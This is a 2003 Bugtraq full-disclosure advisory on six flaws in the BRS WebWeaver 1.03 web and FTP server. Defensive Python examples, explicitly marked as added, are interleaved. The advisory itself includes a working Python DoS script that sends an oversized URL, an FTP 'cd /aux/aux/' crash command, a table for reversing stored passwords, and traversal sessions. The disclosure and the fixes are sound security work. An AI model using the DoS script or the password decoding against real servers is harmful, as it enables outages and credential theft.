Message-ID: <3E888A7E.000005.24135@soapbox.yandex.ru>
Date: Mon, 31 Mar 2003 22:35:42 +0400 (MSD)
From: "euronymous" <just-a-user@...dex.ru>
To: vuln@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: BRS WebWeaver: full disclosure
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: full disclosure
product: BRS WebWeaver 1.03
vendor: http://www.brswebweaver.com
risk: high
date: 31/03/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/019.en.txt
http://f0kp.iplus.ru/bz/019.ru.txt
contact email: euronymous@...us.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
Issues
------
1. DOS Device Path vulnerability in FTP Server
2. Long URL DoS in HTTP Server
3. Weak Encryption Scheme
4. Remote System Information Gathering
5. Path Disclosure in FTP Server
6. Directory Traversal in FTP Server
1. DOS Device Path vulnerability in FTP Server
----------------------------------------------
I have found that the FTP server doesn't check the path typed by the user.
A malicious local user can crash the FTP (and also the HTTP) server on a
non-patched Windows 98 machine.
Just type this command in a WebWeaver FTP session:
cd /aux/aux/
After this the server goes down.
Solutions:
1) Apply the corresponding patch for your Windows
2) Wait for new version of WebWeaver
3) Remove this crap at all ))
2. Long URL DoS in HTTP Server
------------------------------
If any local/remote user passes the HTTP server a URL that contains
2499361 characters, the server crashes within 2-5 minutes.
It eats all RAM and finally hangs the whole system; a reboot is
needed. Exploit below:
}------- start of fWWhtdos.py ---------------{
#! /usr/bin/env python
###
# WebWeaver 1.03 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fWWhtdos.py target
# Ex.: ./fWWhtdos.py 127.0.0.1
########
import sys, httplib
target = sys.argv[1]
spl = "f"*2499361
conn = httplib.HTTPConnection(target)
conn.request("GET", "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fWWhtdos.py ---------------{
The following appears in WebWeaver's error.log:
}-------------------------- start of error.log ------------------------{
31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52 LOG_WARNING Admin Thread NOT Stopped! NOT ASSIGNED!
}--------------------------- end of error.log -------------------------{
Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))
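The defensive counterpart to the exploit above, added here as an example and not part of the original advisory or of WebWeaver: a server reads the request line with a hard byte budget, so a URL of 2499361 characters is refused with 414 after at most a few kilobytes have been buffered, instead of being accumulated in RAM. The limit, the status codes and the sample requests are assumptions modelled on common server behaviour.

```python
"""Added example (not WebWeaver code): read the HTTP request line with a
hard byte budget so an oversized URL is answered with 414 and dropped
instead of being buffered in full. Sizes and behaviour are assumptions
modelled on common server defaults; sample requests are constructed."""
import io

MAX_REQUEST_LINE = 8192   # bytes including CRLF; a common production limit


class RequestLineTooLong(Exception):
    pass


def read_request_line(stream, limit=MAX_REQUEST_LINE):
    """Return the request line without CRLF from a binary stream.

    readline(limit) reads at most `limit` bytes, so memory use is bounded
    no matter how long the client's line is. A full `limit` bytes without
    a newline means the line is too long; fewer bytes without a newline
    means the peer closed the connection early."""
    line = stream.readline(limit)
    if not line.endswith(b"\n"):
        if len(line) >= limit:
            raise RequestLineTooLong("request line exceeds %d bytes" % limit)
        raise EOFError("connection closed before request line was complete")
    return line.rstrip(b"\r\n")


def handle_request_line(stream, limit=MAX_REQUEST_LINE):
    """Return (status, (method, target, version)) for a request stream.

    status is 200 when the line parsed, 414 for an oversized line and 400
    for a malformed or truncated one; on 414/400 the caller sends the
    status and closes the socket without reading the rest of the input."""
    try:
        line = read_request_line(stream, limit)
    except RequestLineTooLong:
        return 414, None
    except EOFError:
        return 400, None
    fields = line.split(b" ")
    if len(fields) != 3 or not fields[2].startswith(b"HTTP/"):
        return 400, None
    method, target, version = (f.decode("ascii", "replace") for f in fields)
    return 200, (method, target, version)


if __name__ == "__main__":
    # Constructed requests: a normal one and one shaped like the advisory's.
    normal = io.BytesIO(b"GET /index.html HTTP/1.0\r\nHost: localhost\r\n\r\n")
    oversized = io.BytesIO(b"GET /" + b"f" * 2499361 + b" HTTP/1.0\r\n")
    print(handle_request_line(normal))      # (200, ('GET', '/index.html', 'HTTP/1.0'))
    print(handle_request_line(oversized))   # (414, None)
```

On a real socket, `conn.makefile("rb")` returns a buffered reader whose `readline(limit)` honours the same size argument as `io.BytesIO`, so the handler can be used unchanged there. The important property is that the rejection happens before the rest of the request is read: the client's remaining megabytes stay in its own send buffer and the kernel's receive window, never in the server process.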
3. Weak Encryption Scheme
-------------------------
WebWeaver `encrypts' FTP users' passwords, and all password
hashes are stored in the \config\users.ini file under the WebWeaver
installation directory. Data is stored in the following format:
user=hashed_passwd
Passwords aren't case-sensitive in WebWeaver. Below you can
see the encryption table:
g i k m o q s u w e == encrypted
1 2 3 4 5 6 7 8 9 0 == plain
з у П й н ч п Ч г е ╩ © == encrypted
q w e r t y u i o p [ ] == plain
З л Н С У Х Щ Ы Э { S == encrypted
a s d f g h j k l ; ' == plain
щ х Л с Й б Я ] a c == encrypted
z x c v b n m , . / == plain
Any local user can get this file [users.ini] and
`decrypt' the user passwords.
Solutions:
1) Wait for the WebWeaver vendor to implement a strong encryption
scheme like MD5 or Blowfish.
2) Remove this crap at all )).
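Added example, not part of the advisory or of WebWeaver: why a table like the one above is unfit for a password file, and what the alternative looks like. The digit row of the table (plaintext 1234567890 stored as gikmoqsuwe) is a fixed one-character substitution, so the stored value is invertible, identical for every user with the same password, and the same length as the password. The second half stores a salted, iterated PBKDF2-HMAC-SHA256 hash from the Python standard library instead; the record format and the iteration count are assumptions, not a recommendation from the vendor.

```python
"""Added example (not WebWeaver code). The digit row of the advisory's
table is a fixed one-character substitution; the PBKDF2 functions show
the kind of salted, iterated hash a password file should store instead.
Record format and iteration count are assumptions."""
import hashlib
import hmac
import os

# Digit row copied from the advisory's table (plain -> `encrypted').
PLAIN_DIGITS = "1234567890"
CIPHER_DIGITS = "gikmoqsuwe"
SUBST = dict(zip(PLAIN_DIGITS, CIPHER_DIGITS))


def substitute(text, table=SUBST):
    """Apply the per-character substitution; characters outside the table
    pass through unchanged (the advisory's table ignores case as well)."""
    return "".join(table.get(ch, ch) for ch in text)


def substitution_weaknesses(table):
    """Properties that make a substitution table unfit for password storage."""
    return {
        # A bijection is invertible: the stored value determines the plaintext.
        "invertible": len(set(table.values())) == len(table),
        # No salt: equal passwords give equal stored values for every user.
        "deterministic": substitute("123", table) == substitute("123", table),
        # Length preserved: the stored value reveals the password length.
        "length_preserving": all(len(substitute(p, table)) == len(p)
                                 for p in table),
    }


def make_record(password, iterations=200_000):
    """Store pbkdf2_sha256$iterations$salt$hash with a fresh 16-byte salt,
    so two users with the same password get different records."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_record(password, record):
    """Recompute the hash with the stored salt and compare in constant time.
    Verification never needs, and cannot recover, the plaintext."""
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    print(substitute("1234567890"))            # gikmoqsuwe, straight from the table
    print(substitution_weaknesses(SUBST))      # all three True
    rec = make_record("123")
    print(rec != make_record("123"))           # True: salted records differ
    print(verify_record("123", rec), verify_record("124", rec))   # True False
```

The verifier is also case-sensitive, unlike the scheme the advisory describes, and the comparison uses `hmac.compare_digest` so that a wrong guess is not distinguishable by timing from a nearly-right one.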
4. Remote System Information Gathering
--------------------------------------
Any remote user can get a lot of useful information about the
system where BRS WebWeaver is installed. If the test CGI scripts
were installed during the installation procedure [the default],
it is enough to go to this URL:
http://hostname/scripts/testcgi.exe
}--------------- start of testcgi.exe output ---------------{
CGI Test Program
Arguments To Testcgi
Argument 1 :
Environment Variables
HTTP_CONNECTION = keep-alive
HTTP_KEEP_ALIVE = 300
HTTP_ACCEPT_CHARSET = utf-8,*
HTTP_ACCEPT_ENCODING = gzip,deflate,compress;q=0.9
HTTP_ACCEPT_LANGUAGE = ru-ru,ru;q=0.5
HTTP_ACCEPT = text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
HTTP_USER_AGENT = Mozilla/5.0 (Windows; U; Win98; ru-RU; rv:1.3) Gecko/20030309
HTTP_HOST = localhost
SERVER_PORT = 80
URL = /scripts/testcgi.exe
LOCAL_ADDR = 195.***.**.**
CONTENT_LENGTH = 0
SERVER_SOFTWARE = BRS WebWeaver/1.03
SERVER_PROTOCOL = HTTP/1.0
SERVER_NAME = ******30
REMOTE_HOST = 127.0.0.1
REMOTE_ADDR = 127.0.0.1
REQUEST_METHOD = GET
DOCUMENT_ROOT = c:\program files\webweaver
SCRIPT_NAME = /scripts/testcgi.exe
GATEWAY_INTERFACE = CGI/1.1
WINDIR = C:\WINDOWS
CMDLINE = WIN
COMSPEC = C:\WINDOWS\COMMAND.COM
PATH = C:\WINDOWS;C:\WINDOWS\COMMAND
WINBOOTDIR = C:\WINDOWS
PROMPT = $p$g
TEMP = C:\WINDOWS\TEMP
TMP = C:\WINDOWS\TEMP
Miscellaneous Information
Working directory: C:/Program Files/WebWeaver/scripts/
Current date and time: 2003/03/31 5:07:32
}--------------- end of testcgi.exe output ---------------{
Solution: Remove this script from the /scripts/ directory.
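Removing the script is the fix; the following is an added example (not WebWeaver code) of the server-side practice that limits what any such script can echo back: the CGI child gets an environment built from an allowlist rather than a copy of the server's whole process environment. The meta-variable names are those of RFC 3875; the OS passthrough set, the function names and the sample values are assumptions.

```python
"""Added example (not WebWeaver code): build the environment handed to a
CGI child from an allowlist instead of inheriting the server's whole
process environment, so a diagnostic script cannot echo WINDIR, COMSPEC
or DOCUMENT_ROOT back to a remote client. The allowlist follows RFC 3875;
the OS passthrough set is an assumption for a Windows host."""

# Meta-variables defined by RFC 3875 that a CGI program may legitimately
# need. PATH_TRANSLATED is deliberately omitted: it carries a filesystem path.
CGI_META_VARIABLES = frozenset({
    "AUTH_TYPE", "CONTENT_LENGTH", "CONTENT_TYPE", "GATEWAY_INTERFACE",
    "PATH_INFO", "QUERY_STRING", "REMOTE_ADDR", "REMOTE_HOST",
    "REMOTE_IDENT", "REMOTE_USER", "REQUEST_METHOD", "SCRIPT_NAME",
    "SERVER_NAME", "SERVER_PORT", "SERVER_PROTOCOL", "SERVER_SOFTWARE",
})
# Process environment the child needs to start at all (assumed minimal set).
OS_PASSTHROUGH = frozenset({"SYSTEMROOT", "PATH", "TEMP", "TMP"})
# Request headers never forwarded as HTTP_*: a client-supplied Proxy header
# would otherwise become HTTP_PROXY in the child (the "httpoxy" class of bug).
BLOCKED_HEADERS = frozenset({"proxy"})


def build_cgi_env(request_vars, headers, process_env):
    """Return the child's environment: allowlisted meta-variables, request
    headers as HTTP_* (RFC 3875 protocol-specific meta-variables) and a
    fixed OS subset. Everything else in process_env is dropped."""
    env = {k: v for k, v in request_vars.items() if k in CGI_META_VARIABLES}
    for name, value in headers.items():
        if name.lower() in BLOCKED_HEADERS:
            continue
        env["HTTP_" + name.upper().replace("-", "_")] = value
    for name in OS_PASSTHROUGH:
        if name in process_env:
            env[name] = process_env[name]
    return env


def leaked_variables(env):
    """Names in a CGI environment that are neither RFC 3875 meta-variables,
    HTTP_* headers nor the OS passthrough set: the entries a test script
    like the one above would reveal for no good reason."""
    return sorted(k for k in env
                  if k not in CGI_META_VARIABLES
                  and not k.startswith("HTTP_")
                  and k not in OS_PASSTHROUGH)


if __name__ == "__main__":
    # Constructed values shaped like the testcgi.exe output above.
    server_vars = {"SERVER_SOFTWARE": "BRS WebWeaver/1.03",
                   "REQUEST_METHOD": "GET", "SCRIPT_NAME": "/scripts/testcgi.exe",
                   "DOCUMENT_ROOT": "c:\\program files\\webweaver",
                   "LOCAL_ADDR": "192.0.2.10"}
    process_env = {"WINDIR": "C:\\WINDOWS", "COMSPEC": "C:\\WINDOWS\\COMMAND.COM",
                   "PATH": "C:\\WINDOWS;C:\\WINDOWS\\COMMAND",
                   "TEMP": "C:\\WINDOWS\\TEMP", "CMDLINE": "WIN"}
    print(leaked_variables({**server_vars, **process_env}))   # what a full copy leaks
    child = build_cgi_env(server_vars, {"Host": "localhost"}, process_env)
    print(sorted(child))                                      # the allowlisted subset
```

The same allowlist is what you would pass as `env=` to `subprocess.run` when launching the CGI program; the child then simply has nothing to print that the request did not already contain.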
5. Path Disclosure in FTP Server
--------------------------------
I wrote about this vulnerability in v1.01 of WebWeaver
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published on the Bugtraq mailing list, but in v1.03
this flaw still wasn't fixed.
}-------------- sample session -----------{
220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir test
257 '/test': directory created.
ftp> mkdir test
550 'c:\ftp\test': can't create directory.
ftp> rmdir test
250 '/test': directory removed.
ftp> rmdir test
550 'c:\ftp\test': no such directory.
ftp>
}-------------- end of sample session -----------{
So, if a user attempts to create an already existing
directory or remove a non-existent directory, the
FTP server outputs the full system path.
Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))
6. Directory Traversal in FTP Server
------------------------------------
I wrote about this vulnerability in v1.01 of WebWeaver
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published on the Bugtraq mailing list, but in v1.03
this flaw still wasn't fixed.
}-------------- sample session -----------{
220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir ../test
257 '/..\test': directory created.
ftp> rmdir ../test
250 '/..\test': directory removed.
ftp> mkdir ../windows/test
257 '/..\windows\test': directory created.
ftp> rmdir ../windows/test
250 '/..\windows\test': directory removed.
ftp>
}-------------- end of sample session -----------{
As you can see, any user can exploit this traversal
bug to create and remove directories outside
ftp_root. But the user cannot use more useful commands
like `ls' or `dir' there.
Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))
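The three FTP findings (issue 1, the DOS device path; issue 5, the real path in error replies; issue 6, traversal above ftp_root) all come down to how a client-supplied path is mapped onto the filesystem. The following is an added example of that mapping done defensively; it is not WebWeaver's code, and the function names, the reply wording and the `exists` callback are assumptions.

```python
"""Added example (not BRS WebWeaver code). Maps an FTP client path onto a
real path under ftp_root, addressing the three FTP findings in the
advisory: reserved DOS device names, traversal past ftp_root, and error
replies that disclose the real path. Names and reply format are assumed."""
import ntpath
import re

# Names Windows resolves to a device wherever they appear in a path, with
# or without an extension: CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9.
_DEVICE_NAME = re.compile(r"^(con|prn|aux|nul|com[1-9]|lpt[1-9])(\.|$)",
                          re.IGNORECASE)
# Characters that are not legal in a Windows file name; ':' also stops a
# client from smuggling a drive letter into a component.
_ILLEGAL = re.compile(r'[<>:"|?*\x00-\x1f]')


class FtpPathError(Exception):
    """Carries a message that names only the client-visible path."""


def resolve_ftp_path(ftp_root, cwd, requested):
    """Return (virtual_path, real_path) for `requested`, taken relative to
    the virtual directory `cwd` unless it is absolute.

    `..` at the virtual root stays at the root (chroot semantics), so the
    real path cannot leave ftp_root. A component that is a DOS device name
    or contains an illegal character raises FtpPathError whose text holds
    only the virtual path, so a 550 built from it never shows ftp_root."""
    raw = requested.replace("\\", "/")          # clients send either separator
    virtual = raw if raw.startswith("/") else cwd.rstrip("/") + "/" + raw
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()
            continue
        # Windows strips trailing dots and spaces, so "aux." is still AUX.
        if _ILLEGAL.search(comp) or _DEVICE_NAME.match(comp.rstrip(". ")):
            raise FtpPathError("'%s': invalid path name" % virtual)
        parts.append(comp)
    virtual_norm = "/" + "/".join(parts)
    root = ntpath.normpath(ftp_root)
    real = ntpath.normpath(ntpath.join(root, *parts)) if parts else root
    # Defence in depth: the result must still lie under ftp_root.
    if real != root and not real.lower().startswith(root.lower() + "\\"):
        raise FtpPathError("'%s': invalid path name" % virtual)
    return virtual_norm, real


def mkd_reply(ftp_root, cwd, requested, exists):
    """Build the reply line for MKD. `exists` is a hypothetical callable
    that tests the real path; every reply quotes the virtual path only,
    unlike the 550 lines in the sessions above."""
    try:
        virtual, real = resolve_ftp_path(ftp_root, cwd, requested)
    except FtpPathError as err:
        return "550 %s" % err
    if exists(real):
        return "550 '%s': can't create directory" % virtual
    return "257 '%s': directory created" % virtual


if __name__ == "__main__":
    root = "c:\\ftp"
    print(resolve_ftp_path(root, "/", "test"))              # ('/test', 'c:\\ftp\\test')
    print(resolve_ftp_path(root, "/", "../windows/test"))   # clamped under c:\ftp
    try:
        resolve_ftp_path(root, "/", "/aux/aux/")
    except FtpPathError as err:
        print("550 %s" % err)                               # no real path in the text
    print(mkd_reply(root, "/", "test", lambda p: True))     # existing directory
```

`ntpath` is platform-independent, so the mapping behaves the same whether the server runs on Windows or the check is exercised on another OS. The `exists` callback stands in for the filesystem so the reply logic can be checked without creating directories.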
shouts: R00tC0de, DWC, DHG, HUNGOSH, security.nnov.ru, all russian
security guyz!! to kate especially ))
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb
f*cking team
================
im not a lame,
not yet a hacker
================